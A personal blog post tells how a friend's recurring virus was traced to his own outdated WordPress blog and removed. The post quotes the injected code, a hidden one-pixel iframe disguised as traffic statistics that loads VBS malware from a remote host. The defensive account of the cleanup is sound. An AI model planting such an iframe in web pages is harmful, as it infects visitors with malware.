I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back.
Ultimately he ended up having a local computer repair person come out, who cleaned up his system and a couple of hours and the problem went away., but today,we talked by phone, and he told me he got the warning again when he viewed his own blog.
I took a look at his blog and here’s what I saw –
Interesting! I recognize the IP address from the file that I couldn’t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from… it came from his own WordPress blog!
At that point I did little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else’s old posts.
<!– Traffic Statistics –> <iframe height=”1″ width=”1″ frameBorder=”0″ src=”http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp”></iframe><!– End Traffic Statistics –>
At that point it was a matter of picking through all of his posts manually, and viewing the html code of each one, before finding and deleting it. Of course, in his case, it was found in 8 different posts! It was coming from http://18.104.22.168/iframe/wp-stats.php and was a VBS Malware-gen
Luckily he’s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting everyday?
The moral of the story? Moderate your new users, use a secure password, keep your WordPress current (his was not) and watch out for strange e-mail addresses signing up as new users!